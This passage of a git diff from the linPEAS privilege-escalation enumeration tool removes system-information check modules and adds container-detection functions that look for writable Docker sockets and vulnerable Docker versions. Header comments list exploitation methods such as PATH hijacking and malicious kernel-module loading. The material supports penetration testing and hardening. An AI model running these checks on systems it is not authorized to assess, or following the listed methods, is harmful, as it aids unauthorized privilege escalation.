-#       - Authentication bypass
-#       - Privilege escalation
-#       - Root access acquisition
-#     * Exploit techniques:
-#       - Race condition exploitation
-#       - Authentication bypass
-#       - Privilege escalation
-#       - System compromise
-# License: GNU GPL
-# Version: 1.0
-# Functions Used:
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-if apt list --installed 2>/dev/null | grep -q 'polkit.*0\.105-26' || \
-   yum list installed 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)' || \
-   rpm -qa 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)'; then
-    echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-    echo ""
-fi
-
--- a/linPEAS/builder/linpeas_parts/1_system_information/16_Protections.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/16_Protections.sh
@ -1,139 +0,0 @@
-# Title: System Information - Protections
-# ID: SY_Protections
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for system security protections and their bypass possibilities:
-#   - AppArmor/SELinux status and profiles
-#   - ASLR status
-#   - Seccomp filters
-#   - Capabilities
-#   - Common vulnerable scenarios:
-#     * Disabled security modules
-#     * Weak security profiles
-#     * Missing security features
-#     * Misconfigured protections
-#   - Exploitation methods:
-#     * Protection bypass: Circumvent security measures
-#     * Common attack vectors:
-#       - AppArmor/SELinux bypass
-#       - ASLR bypass
-#       - Seccomp filter bypass
-#       - Capability abuse
-#     * Exploit techniques:
-#       - Profile bypass
-#       - Memory randomization bypass
-#       - Filter bypass
-#       - Capability exploitation
-#       - Protection circumvention
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: echo_not_found, print_2title, print_list, warn_exec
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables: $ASLR, $hypervisorflag, $detectedvirt
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-#-- SY) AppArmor
-print_2title "Protections"
-print_list "AppArmor enabled? .............. "$NC
-if [ "$(command -v aa-status 2>/dev/null || echo -n '')" ]; then
-    aa-status 2>&1 | sed "s,disabled,${SED_RED},"
-elif [ "$(command -v apparmor_status 2>/dev/null || echo -n '')" ]; then
-    apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
-elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
-    ls -d /etc/apparmor*
-else
-    echo_not_found "AppArmor"
-fi
-
-#-- SY) AppArmor2
-print_list "AppArmor profile? .............. "$NC
-(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
-
-#-- SY) LinuxONE
-print_list "is linuxONE? ................... "$NC
-( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x")
-
-#-- SY) grsecurity
-print_list "grsecurity present? ............ "$NC
-( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
-
-#-- SY) PaX
-print_list "PaX bins present? .............. "$NC
-(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
-
-#-- SY) Execshield
-print_list "Execshield enabled? ............ "$NC
-(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
-
-#-- SY) SElinux
-print_list "SELinux enabled? ............... "$NC
-(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
-
-#-- SY) Seccomp
-print_list "Seccomp enabled? ............... "$NC
-([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
-
-#-- SY) AppArmor
-print_list "User namespace? ................ "$NC
-if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
-
-#-- SY) cgroup2
-print_list "Cgroup2 enabled? ............... "$NC
-([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
-
-#-- SY) Gatekeeper
-if [ "$MACPEAS" ]; then
-    print_list "Gatekeeper enabled? .......... "$NC
-    (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
-
-    print_list "sleepimage encrypted? ........ "$NC
-    (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
-
-    print_list "XProtect? .................... "$NC
-    (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
-
-    print_list "SIP enabled? ................. "$NC
-    csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
-
-    print_list "Sealed Snapshot? ............. "$NC
-    diskutil apfs list | grep "Snapshot Sealed" | awk -F: '{print $2}' | tr -d '[:space:]' | sed "s,Yes,${SED_GREEN}," | sed "s,No,${SED_RED}," || echo_not_found
-
-    print_list "Sealed Snapshot (2nd)? ....... "$NC
-    csrutil authenticated-root status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
-
-
-    print_list "Connected to JAMF? ........... "$NC
-    warn_exec jamf checkJSSConnection
-
-    print_list "Connected to AD? ............. "$NC
-    dsconfigad -show && echo "" || echo_no
-fi
-
-#-- SY) ASLR
-print_list "Is ASLR enabled? ............... "$NC
-ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
-if [ -z "$ASLR" ]; then
-    echo_not_found "/proc/sys/kernel/randomize_va_space";
-else
-    if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
-    echo ""
-fi
-
-#-- SY) Printer
-print_list "Printer? ....................... "$NC
-(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
-
-#-- SY) Running in a virtual environment
-print_list "Is this a virtual machine? ..... "$NC
-hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
-if [ "$(command -v systemd-detect-virt 2>/dev/null || echo -n '')" ]; then
-    detectedvirt=$(systemd-detect-virt)
-    if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
-else
-    if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
-fi
-
-echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/17_Kernel_Modules.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/17_Kernel_Modules.sh
@ -1,62 +0,0 @@
-# Title: System Information - Kernel Modules
-# ID: SY_Kernel_Modules
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for kernel module vulnerabilities and misconfigurations that could lead to privilege escalation:
-#   - Loaded kernel modules with known vulnerabilities
-#   - Kernel modules with weak permissions that could be modified
-#   - Ability to load kernel modules as unprivileged user
-#   - Missing kernel module signing requirements
-#   - Exploitation methods:
-#     * Vulnerable modules: Use known exploits for vulnerable kernel modules
-#     * Weak permissions: Modify kernel modules to inject malicious code
-#     * Module loading: Load malicious kernel modules to get root access
-#     * Common vulnerable modules: nf_tables, eBPF, overlayfs, etc.
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title
-# Global Variables: 
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-echo ""
-print_2title "Kernel Modules Information"
-
-# List loaded kernel modules
-if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
-    print_3title "Loaded kernel modules"
-    if [ -f "/proc/modules" ]; then
-        lsmod
-    else
-        echo_not_found "/proc/modules"
-    fi
-fi
-
-# Check for kernel modules with weak permissions
-print_3title "Kernel modules with weak perms?"
-if [ -d "/lib/modules" ]; then
-    find /lib/modules -type f -name "*.ko" -ls 2>/dev/null | grep -Ev "root\s+root" | sed -${E} "s,.*,${SED_RED},g"
-    if [ $? -eq 1 ]; then
-        echo "No kernel modules with weak permissions found"
-    fi
-else
-    echo_not_found "/lib/modules"
-fi
-echo ""
-
-# Check for kernel modules that can be loaded by unprivileged users
-print_3title "Kernel modules loadable? "
-if [ -f "/proc/sys/kernel/modules_disabled" ]; then
-    if [ "$(cat /proc/sys/kernel/modules_disabled)" = "0" ]; then
-        echo "Modules can be loaded" | sed -${E} "s,.*,${SED_RED},g"
-    else
-        echo "Modules cannot be loaded" | sed -${E} "s,.*,${SED_GREEN},g"
-    fi
-else
-    echo_not_found "/proc/sys/kernel/modules_disabled"
-fi
-
-
-echo "" 
--- a/linPEAS/builder/linpeas_parts/1_system_information/1_Operative_system.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/1_Operative_system.sh
@ -1,42 +0,0 @@
-# Title: System Information - Operative System
-# ID: SY_Operative_system
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for operating system information relevant to privilege escalation:
-#   - OS version and distribution
-#   - Kernel version
-#   - Architecture
-#   - Common vulnerable scenarios:
-#     * Outdated OS versions
-#     * Unpatched systems
-#     * Known vulnerable distributions
-#     * Architecture-specific vulnerabilities
-#   - Exploitation methods:
-#     * Version-specific exploits: Use known exploits for the OS version
-#     * Common attack vectors:
-#       - OS version exploits
-#       - Distribution-specific vulnerabilities
-#       - Architecture-specific exploits
-#       - Kernel version exploits
-#     * Exploit techniques:
-#       - Version-specific payloads
-#       - Distribution-specific attacks
-#       - Architecture-specific techniques
-#       - Kernel exploitation
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info, warn_exec
-# Global Variables: $MACPEAS, $kernelDCW_Ubuntu_Precise_1, $kernelB, $kernelDCW_Ubuntu_Precise_2, $kernelDCW_Ubuntu_Precise_3, $kernelDCW_Ubuntu_Precise_4, $kernelDCW_Ubuntu_Precise_5, $kernelDCW_Ubuntu_Precise_6, $kernelDCW_Rhel5_1, $kernelDCW_Rhel5_2, $kernelDCW_Rhel5_3, $kernelDCW_Rhel6_1, $kernelDCW_Rhel6_2, $kernelDCW_Rhel6_3, $kernelDCW_Rhel6_4, $kernelDCW_Rhel7, $kernelDCW_Ubuntu_Trusty_1, $kernelDCW_Ubuntu_Trusty_2, $kernelDCW_Ubuntu_Trusty_3, $kernelDCW_Ubuntu_Trusty_4, $kernelDCW_Ubuntu_Xenial
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-print_2title "Operative system"
-print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits"
-(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
-warn_exec lsb_release -a 2>/dev/null
-if [ "$MACPEAS" ]; then
-    warn_exec system_profiler SPSoftwareDataType
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/2_Sudo_version.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/2_Sudo_version.sh
@ -1,36 +0,0 @@
-# Title: System Information - Sudo Version
-# ID: SY_Sudo_version
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for sudo vulnerabilities and misconfigurations that could lead to privilege escalation:
-#   - Vulnerable sudo versions with known exploits
-#   - Common vulnerable versions and CVEs:
-#     * CVE-2021-3156 (Baron Samedit): Heap overflow in sudo
-#     * CVE-2021-23239: Potential privilege escalation
-#     * CVE-2021-23240: Potential privilege escalation
-#     * CVE-2021-23241: Potential privilege escalation
-#   - Exploitation methods:
-#     * Version exploits: Use known exploits for vulnerable sudo versions
-#     * Common targets: sudo < 1.9.5p2 (Baron Samedit)
-#     * Exploit techniques:
-#       - Heap overflow exploitation
-#       - Race conditions
-#       - Memory corruption
-#       - Command injection
-# License: GNU GPL
-# Version: 1.0 
-# Functions Used: echo_not_found, print_2title, print_info
-# Global Variables: $sudovB
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "Sudo version"
-if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then
-print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version"
-sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
-else echo_not_found "sudo"
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/3_USBCreator.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/3_USBCreator.sh
@ -1,47 +0,0 @@
-# Title: System Information - USBCreator
-# ID: SY_USBCreator
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for USBCreator vulnerabilities that could lead to privilege escalation:
-#   - Vulnerable policykit-desktop-privileges versions
-#   - Common vulnerable versions:
-#     * policykit-desktop-privileges < 0.21
-#   - Exploitation methods:
-#     * D-Bus command injection through USBCreator
-#     * Abuse of policykit privileges
-#     * Common attack vectors:
-#       - D-Bus method call injection
-#       - PolicyKit authentication bypass
-#       - Command execution through USB creation
-#     * Exploit techniques:
-#       - D-Bus method spoofing
-#       - PolicyKit privilege escalation
-#       - USB device creation abuse
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $DEBUG
-# Initial Functions:
-# Generated Global Variables: $pc_version, $pc_length, $pc_major, $pc_minor
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
-    print_2title "USBCreator"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.html"
-
-    pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
-    if [ -z "$pc_version" ]; then
-        pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
-    fi
-    if [ -n "$pc_version" ]; then
-        pc_length=${#pc_version}
-        pc_major=$(echo "$pc_version" | cut -d. -f1)
-        pc_minor=$(echo "$pc_version" | cut -d. -f2)
-        if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor"  -lt 21 ]; then
-            echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
-        fi
-    fi
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/4_Path.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/4_Path.sh
@ -1,42 +0,0 @@
-# Title: System Information - Path
-# ID: SY_Path
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for PATH environment misconfigurations that could lead to privilege escalation:
-#   - Writable directories in PATH
-#   - Current directory (.) in PATH
-#   - Common vulnerable scenarios:
-#     * Writable system directories in PATH
-#     * Current directory in PATH
-#     * Relative paths in PATH
-#   - Exploitation methods:
-#     * PATH hijacking: Place malicious executables in writable PATH directories
-#     * Common attack vectors:
-#       - Replace common binaries (ls, cat, etc.)
-#       - Create malicious executables with common names
-#       - Abuse sudo PATH inheritance
-#     * Exploit techniques:
-#       - Binary replacement
-#       - Symbolic link attacks
-#       - PATH manipulation
-#       - Sudo PATH abuse
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $DEBUG, $IAMROOT, $OLDPATH, $PATH, $Wfolders
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "PATH"
-print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses"
-if ! [ "$IAMROOT" ]; then
-    echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
-fi
-
-if [ "$DEBUG" ]; then
-     echo "New path exported: $PATH"
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/5_Date.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/5_Date.sh
@ -1,39 +0,0 @@
-# Title: System Information - Date
-# ID: SY_Date
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for system date and uptime information relevant to privilege escalation:
-#   - System uptime
-#   - Last boot time
-#   - System time
-#   - Common vulnerable scenarios:
-#     * Long uptime (unpatched systems)
-#     * Time-based vulnerabilities
-#     * Scheduled tasks timing
-#     * Cron job timing
-#   - Exploitation methods:
-#     * Timing attacks: Abuse time-based vulnerabilities
-#     * Common attack vectors:
-#       - Race conditions
-#       - Time-of-check to time-of-use (TOCTOU)
-#       - Scheduled task abuse
-#       - Cron job timing
-#     * Exploit techniques:
-#       - Race condition exploitation
-#       - TOCTOU attacks
-#       - Scheduled task manipulation
-#       - Cron job abuse
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, warn_exec
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-print_2title "Date & uptime"
-warn_exec date 2>/dev/null
-warn_exec uptime 2>/dev/null
-echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/6_CPU_info.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/6_CPU_info.sh
@ -1,40 +0,0 @@
-# Title: System Information - CPU info
-# ID: SY_CPU_info
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for CPU information relevant to privilege escalation:
-#   - CPU architecture
-#   - CPU features
-#   - CPU vulnerabilities
-#   - Common vulnerable scenarios:
-#     * CPU-specific vulnerabilities (Spectre, Meltdown, etc.)
-#     * Missing CPU mitigations
-#     * Architecture-specific exploits
-#     * CPU feature abuse
-#   - Exploitation methods:
-#     * CPU-based attacks: Abuse CPU vulnerabilities
-#     * Common attack vectors:
-#       - Spectre/Meltdown exploitation
-#       - CPU feature abuse
-#       - Architecture-specific attacks
-#       - CPU timing attacks
-#     * Exploit techniques:
-#       - Side-channel attacks
-#       - CPU feature exploitation
-#       - Architecture-specific techniques
-#       - CPU timing exploitation
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, warn_exec
-# Global Variables: $DEBUG, $EXTRA_CHECKS
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
-    print_2title "CPU info"
-    warn_exec lscpu 2>/dev/null
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/7_Mounts.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/7_Mounts.sh
@ -1,41 +0,0 @@
-# Title: System Information - Mounts
-# ID: SY_Mounts
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for mount point misconfigurations that could lead to privilege escalation:
-#   - Unmounted filesystems
-#   - Mount point permissions
-#   - Mount options
-#   - Common vulnerable scenarios:
-#     * Writable mount points
-#     * Insecure mount options
-#     * Unmounted sensitive filesystems
-#     * Shared mount points
-#   - Exploitation methods:
-#     * Mount point abuse: Exploit mount misconfigurations
-#     * Common attack vectors:
-#       - Mount point modification
-#       - Filesystem remounting
-#       - Mount option abuse
-#       - Shared mount exploitation
-#     * Exploit techniques:
-#       - Mount point manipulation
-#       - Filesystem remounting
-#       - Mount option exploitation
-#       - Shared mount abuse
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $DEBUG, $mountG, $mountpermsB, $mountpermsG, $notmounted, $Wfolders, $mounted
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
-    print_2title "Unmounted file-system?"
-    print_info "Check if you can mount umounted devices"
-    grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/8_Disks.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/8_Disks.sh
@ -1,47 +0,0 @@
-# Title: System Information - Disks
-# ID: SY_Disks
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for disk information and misconfigurations that could lead to privilege escalation:
-#   - Available disks
-#   - Disk permissions
-#   - SMB shares
-#   - Common vulnerable scenarios:
-#     * Writable disks
-#     * Insecure SMB shares
-#     * Exposed disk devices
-#     * Shared storage
-#   - Exploitation methods:
-#     * Disk access abuse: Exploit disk misconfigurations
-#     * Common attack vectors:
-#       - Disk device modification
-#       - SMB share abuse
-#       - Storage device access
-#       - Shared disk exploitation
-#     * Exploit techniques:
-#       - Disk device manipulation
-#       - SMB share exploitation
-#       - Storage device abuse
-#       - Shared disk access
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, warn_exec
-# Global Variables: $DEBUG
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ -d "/dev" ] || [ "$DEBUG" ] ; then
-    print_2title "Any sd*/disk* disk in /dev? (limit 20)"
-    ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
-    echo ""
-fi
-
-
-if [ "$(command -v smbutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
-    print_2title "Mounted SMB Shares"
-    warn_exec smbutil statshares -a
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/9_Disks_extra.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/9_Disks_extra.sh
@ -1,47 +0,0 @@
-# Title: System Information - Disks Extra
-# ID: SY_Disks_extra
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for additional disk information and system resources relevant to privilege escalation:
-#   - Disk utilization
-#   - System resources
-#   - Storage statistics
-#   - Common vulnerable scenarios:
-#     * Low disk space (potential for race conditions)
-#     * Resource exhaustion
-#     * Storage device misconfigurations
-#     * System resource abuse
-#   - Exploitation methods:
-#     * Resource-based attacks: Abuse system resources
-#     * Common attack vectors:
-#       - Disk space exhaustion
-#       - Resource starvation
-#       - Storage device abuse
-#       - System resource manipulation
-#     * Exploit techniques:
-#       - Resource exhaustion
-#       - Storage device exploitation
-#       - System resource abuse
-#       - Resource-based attacks
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, warn_exec
-# Global Variables: $DEBUG, $EXTRA_CHECKS
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if ([ "$(command -v diskutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
-    print_2title "Mounted disks information"
-    warn_exec diskutil list
-    echo ""
-fi
-
-if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
-    print_2title "System stats"
-    (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
-    warn_exec free 2>/dev/null
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/2_container.sh
+++ b/linPEAS/builder/linpeas_parts/2_container.sh
@ -0,0 +1,418 @@
+###########################################
+#---------) Container functions (---------#
+###########################################
+
+containerCheck() {
+  inContainer=""
+  containerType="$(echo_no)"
+
+  # Are we inside docker?
+  if [ -f "/.dockerenv" ] ||
+    grep "/docker/" /proc/1/cgroup -qa 2>/dev/null ||
+    grep -qai docker /proc/self/cgroup  2>/dev/null ||
+    [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then
+
+    inContainer="1"
+    containerType="docker\n"
+  fi
+
+  # Are we inside kubenetes?
+  if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
+    grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
+
+    inContainer="1"
+    if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n"
+    else containerType="kubernetes\n"
+    fi
+  fi
+  
+  # Inside concourse?
+  if grep "/concourse" /proc/1/mounts -qa 2>/dev/null; then
+    inContainer="1"
+    if [ "$containerType" ]; then 
+      containerType="$containerType (concourse)\n"
+    fi
+  fi
+
+  # Are we inside LXC?
+  if env | grep "container=lxc" -qa 2>/dev/null ||
+      grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then
+
+    inContainer="1"
+    containerType="lxc\n"
+  fi
+
+  # Are we inside podman?
+  if env | grep -qa "container=podman" 2>/dev/null ||
+      grep -qa "container=podman" /proc/1/environ 2>/dev/null; then
+
+    inContainer="1"
+    containerType="podman\n"
+  fi
+
+  # Check for other container platforms that report themselves in PID 1 env
+  if [ -z "$inContainer" ]; then
+    if grep -a 'container=' /proc/1/environ 2>/dev/null; then
+      inContainer="1"
+      containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n"
+    fi
+  fi
+}
+
+inDockerGroup() {
+  DOCKER_GROUP="No"
+  if groups 2>/dev/null | grep -q '\bdocker\b'; then
+    DOCKER_GROUP="Yes"
+  fi
+}
+
+checkDockerRootless() {
+  DOCKER_ROOTLESS="No"
+  if docker info 2>/dev/null|grep -q rootless; then
+    DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)"
+  fi
+}
+
+enumerateDockerSockets() {
+  dockerVersion="$(echo_not_found)"
+  if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
+    SEARCHED_DOCKER_SOCKETS="1"
+    for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -o -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do
+      if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then
+        if echo "$int_sock" | grep -Eq "docker"; then
+          dock_sock="$int_sock"
+          echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g"
+          echo "Docker enummeration:"
+          docker_enumerated=""
+
+          if [ "$(command -v curl)" ]; then
+            sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)"
+            dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4)
+            echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
+            if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi
+          fi
+
+          if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then
+            sockInfoResponse="$(docker info)"
+            dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4)
+            printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
+          fi
+        
+        else
+          echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g"
+        fi
+
+      else
+        echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g"
+      fi
+    done
+  fi
+}
+
+checkDockerVersionExploits() {
+  if echo "$dockerVersion" | grep -iq "not found"; then
+    VULN_CVE_2019_13139="$(echo_not_found)"
+    VULN_CVE_2019_5736="$(echo_not_found)"
+    return
+  fi
+
+  VULN_CVE_2019_13139="$(echo_no)"
+  if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then
+    VULN_CVE_2019_13139="Yes"
+  fi
+
+  VULN_CVE_2019_5736="$(echo_no)"
